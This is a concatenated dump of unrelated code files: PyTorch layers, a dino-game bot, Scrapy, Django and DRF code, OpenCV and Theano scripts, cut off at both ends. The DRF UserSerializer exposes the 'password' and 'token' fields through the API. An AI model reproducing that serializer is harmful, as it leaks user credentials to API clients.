return s.format(name=self.__class__.__name__, **self.__dict__)\n\n\nclass SparseChannel(Module):\n \"\"\"Implementation of L0 Sparse Channel\"\"\"\n def __init__(self, in_channels, out_channels, lamba=5e-4, temperature=2./3., local_rep=False, name='',\n conv=None, hc=False,**kwargs):\n \"\"\"\n :param out_channels: Number of output channels\n \"\"\"\n super(SparseChannel, self).__init__()\n self.layer_name = name\n self.in_channels = in_channels\n self.ppos = self.out_channels = out_channels\n # self.droprate_init = droprate_init if droprate_init != 0. else 0.5\n self.temperature = temperature\n self.floatTensor = torch.FloatTensor if not torch.cuda.is_available() else torch.cuda.FloatTensor\n self.use_bias = False\n self.dim_z = out_channels\n self.input_shape = None\n self.local_rep = local_rep\n self.prior_prec = 0\n self.lamba = lamba\n self.conv = conv\n self.fine_tune = False\n self.conv.sparse = True\n if hc:\n self.qz_loga = Parameter(torch.Tensor(out_channels))\n self.qz_loga.data.normal_(3.0, 1e-2)\n\n print(self)\n\n def constrain_parameters(self, **kwargs):\n self.qz_loga.data.clamp_(min=math.log(1e-2), max=math.log(1e2))\n\n def cdf_qz(self, x):\n \"\"\"Implements the CDF of the 'stretched' concrete distribution\"\"\"\n xn = (x - limit_a) / (limit_b - limit_a)\n logits = math.log(xn) - math.log(1 - xn)\n return torch.sigmoid(logits * self.temperature - self.qz_loga).clamp(min=epsilon, max=1 - epsilon)\n\n def quantile_concrete(self, x):\n \"\"\"Implements the quantile, aka inverse CDF, of the 'stretched' concrete distribution\"\"\"\n y = torch.sigmoid((torch.log(x) - torch.log(1 - x) + self.qz_loga) / self.temperature)\n return y * (limit_b - limit_a) + limit_a\n\n def _reg_w(self):\n \"\"\"Expected L0 norm under the stochastic gates, takes into account and re-weights also a potential L2 penalty\"\"\"\n q0 = self.cdf_qz(0)\n w = self.conv.kernel_size[0] * self.conv.kernel_size[1]\n logpw_col = torch.sum(- (.5 * self.conv.weight_decay * self.conv.weight.pow(2)) - self.lamba, 3).sum(2).sum(1)\n logpw = torch.sum((1 - q0) * logpw_col) * w\n logpb = 0 if self.conv.bias is None else - torch.sum((1 - q0) * (.5 * self.conv.weight_decay * self.conv.bias.pow(2) -\n self.lamba))\n return logpb + logpw\n\n def regularization(self):\n return self._reg_w()\n\n def get_eps(self, size):\n \"\"\"Uniform random numbers for the concrete distribution\"\"\"\n eps = self.floatTensor(size).uniform_(epsilon, 1-epsilon)\n eps = Variable(eps)\n return eps\n\n def sample_z(self, batch_size, sample=True, qz_loga=None):\n \"\"\"Sample the hard-concrete gates for training and use a deterministic value for testing\"\"\"\n if qz_loga is None:\n qz_loga = self.qz_loga\n if self.fine_tune:\n pi = torch.sigmoid(qz_loga).view(1, self.dim_z, 1, 1)\n return F.hardtanh(pi * (limit_b - limit_a) + limit_a, min_val=0, max_val=1).detach()\n\n if sample:\n eps = self.get_eps(self.floatTensor(batch_size, self.dim_z))\n z = self.quantile_concrete(eps).view(batch_size, self.dim_z, 1, 1)\n return F.hardtanh(z, min_val=0, max_val=1)\n else: # mode\n pi = torch.sigmoid(qz_loga).view(1, self.dim_z, 1, 1)\n return F.hardtanh(pi * (limit_b - limit_a) + limit_a, min_val=0, max_val=1)\n\n def forward(self, input_, qz_loga=None):\n if qz_loga is not None:\n self.qz_loga = qz_loga\n # else:\n # self.loga = math.log(100) * torch.tanh(self.qz_loga)\n if self.input_shape is None:\n self.input_shape = input_.size()\n # if self.local_rep or not self.training:\n z = self.sample_z(input_.size(0), sample=self.training,)\n self.z = z\n return input_.mul(z)\n # else:\n # z = self.quantile_concrete(self.get_eps(self.floatTensor(self.dim_z))).view(self.dim_z, 1, 1, 1)\n # return F.hardtanh(z, min_val=0, max_val=1) * self.weights\n\n def __repr__(self):\n return 'SparseChannel lambda={}'.format(self.lamba)\n\n\nclass MAPBatchNorm2d(torch.nn.BatchNorm2d):\n def __init__(self, sparse_layer, l):\n super(MAPBatchNorm2d, self).__init__(l)\n self.sparse = sparse_layer\n\n def forward(self, input):\n self.input_shape = input.size()\n return torch.nn.BatchNorm2d.forward(self, input)\n\n def flops_params(self):\n # if self.sparse_layer is not None:\n # x = torch.zeros(self.input_shape[2:])\n # nelements = x.numel() * self.sparse_layer.ppos\n # else:\n # x = torch.zeros(self.input_shape[1:])\n # nelements = x.numel()\n\n x = torch.zeros(self.input_shape[1:])\n nelements = x.numel()\n\n total_ops = 2 * nelements\n return torch.tensor([total_ops, self.weight.numel() + self.bias.numel()])\n\n\nclass AdaptiveAvgPool2d(torch.nn.AdaptiveAvgPool2d):\n def forward(self, input):\n self.input = input\n self.y = torch.nn.AdaptiveAvgPool2d.forward(self, input)\n return self.y\n\n def flops_params(self):\n x = self.input\n kernel = torch.DoubleTensor([*(x[0].shape[2:])]) // torch.DoubleTensor(list((self.output_size,))).squeeze()\n total_add = torch.prod(kernel)\n total_div = 1\n kernel_ops = total_add + total_div\n num_elements = self.y[0].numel()\n total_ops = kernel_ops * num_elements\n return torch.tensor([total_ops, 0])\n","sub_path":"models/resnet50/l0_layers.py","file_name":"l0_layers.py","file_ext":"py","file_size_in_byte":10117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"139648492","text":"import pyautogui\r\nimport time\r\nimport math\r\nfrom multiprocessing import Process\r\n\r\n\r\nbegin_time = time.time() + 3\r\nfly = 0\r\nww = 480\r\n\r\n\r\ndef view_distance():\r\n global ww\r\n while time.time() - begin_time < 150:\r\n ww += 0.375\r\n time.sleep(0.071)\r\n print(ww, \"view\")\r\n\r\n\r\ndef dino_action():\r\n global fly\r\n while True:\r\n print(ww, \"act\")\r\n vix = 0\r\n screen = pyautogui.screenshot(region=(0, 565, 1500, 150)) # делаем снимок области\r\n colour_1 = screen.getpixel((1, 132))\r\n colour_2 = colour_1\r\n first = 1\r\n second = 0\r\n for x in range(1, 1500):\r\n lo_colour = screen.getpixel((x, 132))\r\n if lo_colour == colour_1:\r\n first += 1\r\n else:\r\n colour_2 = lo_colour\r\n second += 1\r\n if first > second:\r\n current_colour = colour_1\r\n else:\r\n current_colour = colour_2\r\n\r\n d = {5, 70, 110}\r\n for x in range(239, math.ceil(ww)):\r\n if vix == 1:\r\n break\r\n for y in d:\r\n if current_colour == screen.getpixel((x, y)):\r\n vix = 1\r\n fly = 1\r\n pyautogui.keyDown('SPACE')\r\n time.sleep(0.2)\r\n if fly == 1:\r\n for x in range(60, 100):\r\n if current_colour == screen.getpixel((x, 110)):\r\n break\r\n pyautogui.keyDown('DOWN')\r\n time.sleep(0.02)\r\n pyautogui.keyUp('DOWN')\r\n fly = 0\r\n\r\n\r\nif __name__ == '__main__':\r\n proc = Process(target=view_distance, args=())\r\n proc.start()\r\n proc = Process(target=dino_action, args=())\r\n proc.start()\r\n\r\n","sub_path":"src/dino_v3.2.py","file_name":"dino_v3.2.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"616414625","text":"import csv\n\nlista_instancia = ['Aleatorio/aleatorio_pequeno_',\n 'Aleatorio/aleatorio_medio_',\n 'Aleatorio/aleatorio_grande_',\n 'Aleatorio/aleatorio_gigante_',\n 'Falkenauer_T/falkenauer_t60_',\n 'Falkenauer_T/falkenauer_t120_',\n 'Falkenauer_T/falkenauer_t249_',\n 'Falkenauer_T/falkenauer_t501_',\n 'Falkenauer_U/falkenauer_u120_',\n 'Falkenauer_U/falkenauer_u250_',\n 'Falkenauer_U/falkenauer_u500_',\n 'Falkenauer_U/falkenauer_u1000_']\n\nlista_instancia_multiconflito = [10, 30, 50, 70]\n\n\narquivo = open(f'resultados/instancias_vazio.csv', 'w+')\narquivo_csv = csv.writer(arquivo)\narquivo_csv.writerow(['Instância', 'Com conflitos', 'Conflitos', 'Ordem', 'Executou', 'Anúncios', 'Quadros', 'Tamanho quadro', 'Espaço ocupado', 'Métrica', 'Tempo', 'Melhor iteração', 'Solução', 'Iterações'])\n\narquivo_csv.writerow([f'instancias/basico/', 'N', 0, 1])\narquivo_csv.writerow([f'instancias/basico/', 'S', 30, 1])\n\nfor j in range(11):\n arquivo_csv.writerow([f'instancias/Multiconflito/multiconflito_{lista_instancia_multiconflito[0]}/', 'N', 0, str(j + 1)])\n\nfor instancia in lista_instancia_multiconflito:\n for j in range(11):\n arquivo_csv.writerow([f'instancias/Multiconflito/multiconflito_{instancia}/', 'S', instancia, str(j + 1)])\n\nfor instancia in lista_instancia:\n for i in range(5):\n indice = str(i).zfill(2)\n for j in range(11):\n arquivo_csv.writerow([f'instancias/{instancia}{indice}/', 'N', 0, str(j + 1)])\n for j in range(11):\n arquivo_csv.writerow([f'instancias/{instancia}{indice}/', 'S', 30, str(j + 1)])\n\narquivo.close()\n","sub_path":"resultados/gera_planilha_instancias.py","file_name":"gera_planilha_instancias.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"139110465","text":"import numpy as np\nimport cv2\n\nimg1 = cv2.imread('test_images/box.png') # queryImage\nimg2 = cv2.imread('test_images/box_in_scene.png') # trainImage\n\n# Initiate SIFT detector\nsift = cv2.xfeatures2d.SIFT_create()\n\n# find the keypoints and descriptors with SIFT\nkp1, des1 = sift.detectAndCompute(img1,None)\nkp2, des2 = sift.detectAndCompute(img2,None)\n\n# BFMatcher with default params\nbf = cv2.BFMatcher()\nmatches = bf.knnMatch(des1,des2, k=2)\n\n# Apply ratio test\ngood = []\nfor m,n in matches:\n if m.distance < 0.75*n.distance:\n good.append([m])\n\n# cv2.drawMatchesKnn expects list of lists as matches.\nimg3 = cv2.drawMatchesKnn(img1,kp1,img2,kp2,good,None,flags=2)\n\ncv2.imshow('image3', img3)\ncv2.waitKey()\ncv2.destroyAllWindows()","sub_path":"openCV/feature_match/feature_book/exam_feature_match.py","file_name":"exam_feature_match.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"594287063","text":"import torch\nfrom LogisticRegression import LogisticRegression\n\n\nbatch_size = 256\noutput_size = 2\nn_iter = 10000\nprint_freq = n_iter // 10\ncriterion = torch.nn.CrossEntropyLoss()\nlearning_rate = 0.005\nfeatures_not_to_use = [\"EmployeeCount\", \"Over18\", \"StandardHours\"]\n\n\ndef get_model(_device, _input_size):\n global model, optimizer, scheduler, input_size, device\n input_size = _input_size\n device = _device\n model = LogisticRegression(input_size, output_size).to(device)\n optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate)\n scheduler = torch.optim.lr_scheduler.StepLR(optimizer, n_iter // 3)\n","sub_path":"src/method_2/hyperparameters.py","file_name":"hyperparameters.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435003842","text":"# This Python file uses the following encoding: utf-8\nfrom django.shortcuts import render\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponse\nfrom models import Book\n\n# Create your views here.\ndef search (request):\n error = False\n if 'input' in request.GET:\n answer = request.GET.get('input')\n if not answer:\n error = True\n elif len(answer) > 20:\n error = True\n else:\n books = Book.objects.filter(title__icontains = answer)\n return render_to_response('search_results.html', {'books': books, 'query':answer})\n return render_to_response('search_form.html', {'error': error})\n","sub_path":"books/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"219945607","text":"import mlrun\n\n\ndef prep_data(context, source_url: mlrun.DataItem, label_column=\"label\"):\n # Convert the DataItem to a pandas DataFrame\n df = source_url.as_df()\n print(\"data url:\", source_url.url)\n df[label_column] = df[label_column].astype(\"category\").cat.codes\n\n # Record the DataFrane length after the run\n context.log_result(\"num_rows\", df.shape[0])\n\n # Store the data set in your artifacts database\n context.log_dataset(\"cleaned_data\", df=df, index=False, format=\"csv\")\n","sub_path":"tests/system/projects/assets/prep_data.py","file_name":"prep_data.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"256410375","text":"from pathlib import Path\n\nfrom smarts.core.colors import Colors\nfrom smarts.sstudio import gen_scenario\nfrom smarts.sstudio import types as t\n\nscenario_id = \"ff239c9d-e4ff-4acc-bad5-bd55648c212e\"\nscenario_path = None\n\ntraffic_histories = [\n t.TrafficHistoryDataset(\n name=f\"argoverse_{scenario_id}\",\n source_type=\"Argoverse\",\n input_path=scenario_path,\n )\n]\n\nduration = 11\nego_mission = [t.EndlessMission(begin=(\"road-202833190-202832889-202833142\", 2, \"max\"))]\n\nleader_id = \"history-vehicle-46408$\"\n# runtime = 11\ngen_scenario(\n t.Scenario(\n ego_missions=ego_mission,\n map_spec=t.MapSpec(source=f\"{scenario_path}\", lanepoint_spacing=1.0),\n traffic_histories=traffic_histories,\n scenario_metadata=t.ScenarioMetadata(\n actor_of_interest_re_filter=leader_id,\n actor_of_interest_color=Colors.Blue,\n scenario_difficulty=0.3,\n scenario_duration=duration,\n ),\n ),\n output_dir=Path(__file__).parent,\n)\n","sub_path":"scenarios/argoverse/vehicle_following/ff239c9d-e4ff-4acc-bad5-bd55648c212e_0_agents_1/scenario.py","file_name":"scenario.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"540248198","text":"from rest_framework import serializers\nfrom .models import Employee,User,Training,Budget,Trainees,IndividualPoints,EmployeeEvaluation,Department,RolesResponsibilities,Schedule,EmploymentDetails,EmploymentHistory,UserLogs,AccountSettings\n\nclass EmployeeSerializers(serializers.ModelSerializer):\n \n class Meta:\n model = Employee\n fields = ('url',\n 'id',\n 'employeeID',\n 'firstname',\n 'middlename',\n 'lastname',\n 'address',\n 'contact_number',\n 'gender',\n 'birthday',\n 'age',\n 'citizenship',\n 'height',\n 'weight',\n 'blood_type',\n 'status',\n 'image'\n )\n\nclass UserSerializers(serializers.ModelSerializer):\n employee_id = EmployeeSerializers(read_only=True)\n employee = serializers.PrimaryKeyRelatedField(queryset=Employee.objects.all(), source='employee_id', write_only=False)\n class Meta:\n model = User\n fields = ('id','url','employee_id','employee','username','password','token','user_type')\n \n\nclass TrainingSerializers(serializers.ModelSerializer):\n class Meta:\n model = Training\n fields = ('id','url','training','date','time','timeDisplay','speaker','venue','address')\n\nclass BudgetSerializers(serializers.ModelSerializer):\n training = TrainingSerializers(read_only=True)\n training_id = serializers.PrimaryKeyRelatedField(queryset=Training.objects.all(), source='training', write_only=False)\n class Meta:\n model = Budget\n fields = ('id','url','training_id','training','reference_number','description','date','amount')\n \n\nclass TraineesSerializers(serializers.ModelSerializer):\n training = TrainingSerializers(read_only=True)\n training_id = serializers.PrimaryKeyRelatedField(queryset=Training.objects.all(), source='training', write_only=False)\n employee = EmployeeSerializers(read_only=True)\n employee_id = serializers.PrimaryKeyRelatedField(queryset=Employee.objects.all(), source='employee', write_only=False)\n\n class Meta:\n model = Trainees\n fields = ('id', 'url','training_id','training','employee_id', 'employee')\n \nclass IndividualPointsSerializers(serializers.ModelSerializer):\n employee_id = EmployeeSerializers(read_only=True)\n employee = serializers.PrimaryKeyRelatedField(queryset=Employee.objects.all(), source='employee_id', write_only=False)\n class Meta: \n model = IndividualPoints\n fields = ('id',\n 'url',\n 'employee_id',\n 'employee',\n 'date',\n 'paid',\n 'notpaid_billable',\n 'extra_workload',\n 'management',\n 'training',\n 'admin',\n 'investment',\n 'non_billable',\n 'sales',\n 'points',)\n \n \nclass EmployeeEvaluationSerializers(serializers.ModelSerializer):\n class Meta:\n model = EmployeeEvaluation\n fields = ('id','url','employee_id','date','description','certified_by','performance_rating')\n\nclass DepartmentSerializers(serializers.ModelSerializer):\n class Meta:\n model = Department\n fields = ('id','url','department_name','classification')\n\nclass RolesResponsibilitiesSerializers(serializers.ModelSerializer):\n class Meta:\n model = RolesResponsibilities\n fields = ('id','url','position','responsibilities')\n\nclass ScheduleSerializers(serializers.ModelSerializer):\n class Meta:\n model = Schedule\n fields = ('id','url','login','breakout','breakin','logout')\n\nclass EmploymentDetailsSerializers(serializers.ModelSerializer):\n employee_id = EmployeeSerializers(read_only=True)\n employee = serializers.PrimaryKeyRelatedField(queryset=Employee.objects.all(), source='employee_id', write_only=False)\n department_id = DepartmentSerializers(read_only=True)\n department = serializers.PrimaryKeyRelatedField(queryset=Department.objects.all(), source='department_id', write_only=False)\n roles_responsibilities_id = RolesResponsibilitiesSerializers(read_only=True)\n roles_responsibilities = serializers.PrimaryKeyRelatedField(queryset=RolesResponsibilities.objects.all(), source='roles_responsibilities_id', write_only=False)\n\n schedule_id = ScheduleSerializers(read_only=True)\n schedule = serializers.PrimaryKeyRelatedField(queryset=Schedule.objects.all(), source='schedule_id', write_only=False)\n class Meta:\n model = EmploymentDetails\n fields = ('id',\n 'url',\n 'employee_id',\n 'employee',\n 'department_id',\n 'department',\n 'date_employed',\n 'date_effective',\n 'roles_responsibilities_id',\n 'roles_responsibilities',\n 'quota',\n 'salary_base',\n 'basic_rate',\n 'incentive',\n 'challenge_quota',\n 'designation',\n 'assignment',\n 'employee_type',\n 'employment_status',\n 'resignation_date',\n 'end_of_contract',\n 'remarks_for_resignation_termination',\n 'flexi',\n 'schedule_id',\n 'schedule')\n\nclass EmploymentHistorySerializers(serializers.ModelSerializer):\n employee_id = EmployeeSerializers(read_only=True)\n employee = serializers.PrimaryKeyRelatedField(queryset=Employee.objects.all(), source='employee_id', write_only=False)\n department_id = DepartmentSerializers(read_only=True)\n department = serializers.PrimaryKeyRelatedField(queryset=Department.objects.all(), source='department_id', write_only=False)\n roles_responsibilities_id = RolesResponsibilitiesSerializers(read_only=True)\n roles_responsibilities = serializers.PrimaryKeyRelatedField(queryset=RolesResponsibilities.objects.all(), source='roles_responsibilities_id', write_only=False)\n \n schedule_id = ScheduleSerializers(read_only=True)\n schedule = serializers.PrimaryKeyRelatedField(queryset=Schedule.objects.all(), source='schedule_id', write_only=False)\n class Meta:\n model = EmploymentHistory\n fields = ('id',\n 'url',\n 'employee_id',\n 'employee',\n 'department_id',\n 'department',\n 'date_employed',\n 'date_effective',\n 'roles_responsibilities_id',\n 'roles_responsibilities',\n 'quota',\n 'salary_base',\n 'basic_rate',\n 'incentive',\n 'challenge_quota',\n 'designation',\n 'assignment',\n 'employee_type',\n 'employment_status',\n 'resignation_date',\n 'end_of_contract',\n 'remarks_for_resignation_termination',\n 'flexi',\n 'schedule_id',\n 'schedule',\n 'date_updated')\n\nclass UserLogsSerializers(serializers.ModelSerializer):\n user_id = UserSerializers(read_only=True)\n user = serializers.PrimaryKeyRelatedField(queryset=User.objects.all(), source='user_id', write_only=False)\n class Meta:\n model = UserLogs\n fields = ('id','url','user_id','user','description','action','date')\n\nclass AccountSettingsSerializers(serializers.ModelSerializer):\n class Meta:\n model = AccountSettings\n fields = ('id',\n 'url',\n 'user_type',\n 'employeeProfile',\n 'individualPoints',\n 'trainingSeminar',\n 'positionResponsibilities',\n 'reports',\n 'adminSettings',\n 'departmentSettings',\n 'userSettings',\n 'userLogs'\n )\n ","sub_path":"tmra_backend/adminapi/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":7374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"247771662","text":"# -*- coding: utf-8 -*-\nfrom scrapy.spiders import Spider\nfrom scrapy.selector import Selector\nfrom ..items import hjItem\nfrom scrapy.spiders import CrawlSpider, Rule\nfrom scrapy.linkextractors import LinkExtractor\n\n\nimport sys\nreload(sys)\nsys.setdefaultencoding( \"utf-8\" )\n\nclass lnSpider(CrawlSpider):\n name = \"learn\"\n allowed_domains = [\"kr.300168.com\"]\n start_urls = [\n\"http://kr.300168.com/news/list-16.html\",\n\"http://kr.300168.com/news/list-17.html\",\n\"http://kr.300168.com/news/list-5.html\",\n\"http://kr.300168.com/shangwu/list-19.html\"\n\n\n\n ]\n\n rules=(\n Rule(LinkExtractor(allow=('list-\\d+-\\d'),deny=('entertain')) ,\\\n callback='parse_url',follow=True),\n Rule(LinkExtractor(allow=('show'),deny=('enterdsadsa')) ,\\\n callback='parse_al'),\n\n\n )\n\n def parse_url(self, response):\n #print response.url\n pass\n def parse_al(self, response):\n url=response.url\n name=response.xpath(\"//h1[@class='title']/text()\").extract()[0]\n\n krs=response.xpath(\"//div[@class='langs_en']/text()\").extract()\n zhs=response.xpath(\"//div[@class='langs_cn']/text()\").extract()\n if len(krs) and len(krs)==len(zhs):\n\n pair_num=len(krs)\n content=[]\n for i in range(pair_num):\n pair={}\n pair[\"kr\"]=krs[i]\n pair[\"zh\"]=zhs[i]\n\n content.append(pair)\n else:\n krs=response.xpath(\"//div[@class='para original']/text()\").extract()\n zhs=response.xpath(\"//div[@class='para translate grey']/text()\").extract()\n if len(krs) and len(krs)==len(zhs):\n pair_num=len(krs)\n content=[]\n for i in range(pair_num):\n pair={}\n pair[\"kr\"]=krs[i]\n pair[\"zh\"]=zhs[i]\n\n content.append(pair)\n else:\n return\n hj=hjItem()\n hj[\"title\"]=name\n hj[\"content\"]=content\n hj[\"url\"]=url\n return hj\n","sub_path":"hj/hj/spiders/ln.py","file_name":"ln.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"587324419","text":"from django.shortcuts import get_object_or_404, render\nfrom .forms import AdForm , CommentForm\nfrom .models import Ad , Category , Comment\n# Create your views here.\n\n\n\n\ndef all_ads(request):\n all_Ads = Ad.objects.all()\n print(all_Ads)\n return render(request,'ad/all-ads.html',{'ads':all_Ads})\n\n\n# class Adlist(ListView , CreateView):\n# model = Ad\n# template_name = 'ad/all-ads.html'\n\n\ndef single_ad(request,id):\n ad = Ad.objects.get(id=id)\n comments = Comment.objects.filter(ad=ad)\n\n\n if request.method == 'POST': ## save\n form = CommentForm(request.POST)\n if form.is_valid():\n myform = form.save(commit=False)\n myform.author = request.user\n myform.ad = ad\n myform.save()\n else:\n form = CommentForm()\n\n return render(request,'ad/single.html',{'ad':ad , 'comments' : comments , 'form':form})\n\n\ndef all_categories(request):\n all_category = Category.objects.filter(main_category=None)\n print(all_categories)\n return render(request,'ad/all-category.html',{'all_category':all_category})\n\n\ndef category_ads(request , id):\n category = get_object_or_404(Category,id=id)\n category_ads = Ad.objects.filter(category=category)\n\n return render(request,'ad/category_ads.html',{'category_ads':category_ads})\n\n\n\ndef add_ad(request):\n if request.method == 'POST': ## save\n form = AdForm(request.POST , request.FILES)\n if form.is_valid():\n myform = form.save(commit=False)\n myform.owner = request.user\n myform.save()\n else:\n form = AdForm()\n\n return render(request,'ad/post-ad.html',{'form':form})\n\n\n\ndef like_ad(request,id):\n pass","sub_path":"ad/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"602185428","text":"\"\"\"\nUsage:\n visualize_contour.py [--load_filename=] [--save_filename=] [--dataset_i=]\\\n visualize_contour.py -h | --help\n\nOptions:\n -h --help Show this screen.\n --load_filename= [default: VAT_1.pkl]\n --save_filename= [default: VAT_1.pdf]\n --dataset_i= [default: 1]\n\"\"\"\n\nimport sys\nfrom docopt import docopt\n\nimport theano\nimport numpy\nfrom numpy import linalg\nfrom matplotlib.patches import Circle, Arc\nimport matplotlib.pyplot as plt\n\nfrom six.moves import cPickle as pickle\n\nfrom theano import tensor as T\nfrom source.costs import LDS_finite_diff\n\nimport os\nimport errno\n\n\ndef make_sure_path_exists(path):\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise\n\n\ndef visualize_contour_for_synthetic_dataset(model, d_i, x_data, y_data, basis, with_lds=False, epsilon=0.5, power_iter=5, save_filename='prob_cont'):\n linewidth = 10\n\n range_x = numpy.arange(-2.0, 2.1, 0.05)\n A_inv = linalg.inv(numpy.dot(basis, basis.T))\n train_x_org = numpy.dot(x_data, numpy.dot(basis.T, A_inv))\n test_x_org = numpy.zeros((range_x.shape[0] ** 2, 2))\n train_x_1_ind = numpy.where(y_data == 1)[0]\n train_x_0_ind = numpy.where(y_data == 0)[0]\n\n for i in range(range_x.shape[0]):\n for j in range(range_x.shape[0]):\n test_x_org[range_x.shape[0] * i + j, 0] = range_x[i]\n test_x_org[range_x.shape[0] * i + j, 1] = range_x[j]\n\n test_x = numpy.dot(test_x_org, basis)\n x = T.matrix()\n f_p_y_given_x = theano.function(inputs=[x], outputs=model.forward_test(x))\n pred = f_p_y_given_x(numpy.asarray(test_x, 'float32'))[:, 1]\n\n Z = numpy.zeros((range_x.shape[0], range_x.shape[0]))\n for i in range(range_x.shape[0]):\n for j in range(range_x.shape[0]):\n Z[i, j] = pred[range_x.shape[0] * i + j]\n\n Y, X = numpy.meshgrid(range_x, range_x)\n\n fontsize = 20\n rc = 'r'\n bc = 'b'\n\n if d_i == 1:\n rescale = 1.0 # /numpy.sqrt(500)\n arc1 = Arc(xy=[0.5 * rescale, -0.25 * rescale], width=2.0 * rescale, height=2.0 * rescale, angle=0, theta1=270,\n theta2=180, linewidth=linewidth, alpha=0.15, color=rc)\n arc2 = Arc(xy=[-0.5 * rescale, +0.25 * rescale], width=2.0 * rescale, height=2.0 * rescale, angle=0, theta1=90,\n theta2=360, linewidth=linewidth, alpha=0.15, color=bc)\n fig = plt.gcf()\n fig.gca().add_artist(arc1)\n fig.gca().add_artist(arc2)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n else:\n rescale = 1.0 # /numpy.sqrt(500)\n circle1 = Circle((0, 0), 1.0 * rescale, color=rc, alpha=0.2, fill=False, linewidth=linewidth)\n circle2 = Circle((0, 0), 0.15 * rescale, color=bc, alpha=0.2, fill=False, linewidth=linewidth)\n fig = plt.gcf()\n fig.gca().add_artist(circle1)\n fig.gca().add_artist(circle2)\n plt.xticks(fontsize=fontsize)\n plt.yticks(fontsize=fontsize)\n\n levels = [0.05, 0.2, 0.35, 0.5, 0.65, 0.8, 0.95]\n cs = plt.contour(X * rescale, Y * rescale, Z, 7, cmap='bwr', vmin=0., vmax=1.0, linewidths=8., levels=levels)\n cbar = plt.colorbar(cs)\n cbar.ax.tick_params(labelsize=fontsize)\n plt.setp(cs.collections, linewidth=1.0)\n plt.contour(X * rescale, Y * rescale, Z, 1, cmap='binary', vmin=0, vmax=0.5, linewidths=2.0)\n\n plt.xlim([-2. * rescale, 2. * rescale])\n plt.ylim([-2. * rescale, 2. * rescale])\n plt.xticks([-2.0, -1.0, 0, 1, 2.0], fontsize=fontsize)\n plt.yticks([-2.0, -1.0, 0, 1, 2.0], fontsize=fontsize)\n\n plt.scatter(train_x_org[train_x_1_ind, 0] * rescale, train_x_org[train_x_1_ind, 1] * rescale, s=10, marker='o',\n c=rc, label='$y=1$')\n plt.scatter(train_x_org[train_x_0_ind, 0] * rescale, train_x_org[train_x_0_ind, 1] * rescale, s=10, marker='*',\n c=bc, label='$y=0$')\n\n lds_part = \"\"\n if with_lds == True:\n x = T.matrix()\n f_LDS = theano.function(inputs=[],\n outputs=LDS_finite_diff(x=x,\n forward_func=model.forward_test,\n main_obj_type='CE',\n epsilon=epsilon,\n norm_constraint='L2',\n num_power_iter=power_iter),\n givens={x: x_data})\n ave_LDS = numpy.mean([f_LDS().mean() for i in range(50)])\n print(ave_LDS)\n lds_part = '\\nAverage $\\widetilde{\\\\rm LDS}=%.3f$' % ave_LDS\n plt.title('%s Valid Error %g%s' % (args[\"--load_filename\"].split(\"_\")[0], err_rate, lds_part))\n make_sure_path_exists(\"./figure\")\n # plt.show()\n plt.savefig('figure/' + save_filename)\n plt.close()\n\n\nif __name__ == '__main__':\n args = docopt(__doc__)\n dataset_i = int(args['--dataset_i'])\n\n with open('dataset/syndata_' + str(dataset_i) + '.pkl', \"rb\") as f:\n if sys.version_info.major == 3:\n dataset = pickle.load(f, encoding='bytes')\n else:\n dataset = pickle.load(f)\n\n x_train = numpy.asarray(dataset[0][0][0], dtype=theano.config.floatX)\n t_train = numpy.asarray(dataset[0][0][1], dtype='int32')\n x_valid = numpy.asarray(dataset[0][1][0], dtype=theano.config.floatX)\n t_valid = numpy.asarray(dataset[0][1][1], dtype='int32')\n\n with open('trained_model/' + args['--load_filename'], \"rb\") as f2:\n if sys.version_info.major == 3:\n temps = pickle.load(f2, encoding='bytes')\n model = temps[0]\n else:\n model = pickle.load(f2)[0]\n\n x = T.matrix()\n f_p_y = theano.function(inputs=[x], outputs=model.forward(x))\n pred = f_p_y(numpy.asarray(x_valid, 'float32'))\n acc = 1.0 * numpy.sum(pred.argmax(1) == t_valid) / pred.shape[0]\n err_rate = 1 - acc\n print(\"acc %g error rate %g\" % (acc, err_rate))\n\n visualize_contour_for_synthetic_dataset(model, dataset_i, x_valid, t_valid, dataset[1], with_lds=True, save_filename=\"test-\"+args['--save_filename'])\n visualize_contour_for_synthetic_dataset(model, dataset_i, x_train, t_train, dataset[1], with_lds=True, save_filename=args['--save_filename'])\n","sub_path":"visualize_contour.py","file_name":"visualize_contour.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"604612222","text":"# -*- coding: utf-8 -*-\nfrom django.contrib import messages\nfrom django.forms import formset_factory\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\n\nfrom constructors.form import SchemeForm, EquipmentListForm, EquipmentConstructorSingleForm, AddEquipmentForm, \\\n EquipmentSingleWithCtnForm, SchemeSingleForm, EquipmentListWithoutSWForm, 